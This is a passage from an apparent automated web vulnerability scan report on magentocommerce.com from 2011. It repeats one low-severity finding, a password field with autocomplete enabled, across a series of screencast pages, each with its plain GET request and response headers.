Set-Cookie: exp_last_activity=1313176046; expires=Sat, 11-Aug-2012 15:07:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:26 GMT
Content-Length: 34645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/designers-guide-1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 37478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/gift-certificates-cards/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176002; expires=Sat, 11-Aug-2012 15:06:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:43 GMT
Content-Length: 33319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/grouped-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176154; expires=Sat, 11-Aug-2012 15:09:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:15 GMT
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175988; expires=Sat, 11-Aug-2012 15:06:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:28 GMT
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/landing-pages/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176057; expires=Sat, 11-Aug-2012 15:07:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:37 GMT
Content-Length: 36261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.88. http://www.magentocommerce.com/media/screencasts/permissions/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176006; expires=Sat, 11-Aug-2012 15:06:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:46 GMT
Content-Length: 33592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/product-comparison/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176058; expires=Sat, 11-Aug-2012 15:07:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:38 GMT
Content-Length: 33268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.91. http://www.magentocommerce.com/media/screencasts/search/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176174; expires=Sat, 11-Aug-2012 15:09:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:34 GMT
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/static-blocks/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176010; expires=Sat, 11-Aug-2012 15:06:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:51 GMT
Content-Length: 34297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/transactional-email/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176037; expires=Sat, 11-Aug-2012 15:07:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:18 GMT
Content-Length: 34426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.95. http://www.magentocommerce.com/media/screencasts/upsells/view  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /media/screencasts/upsells/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
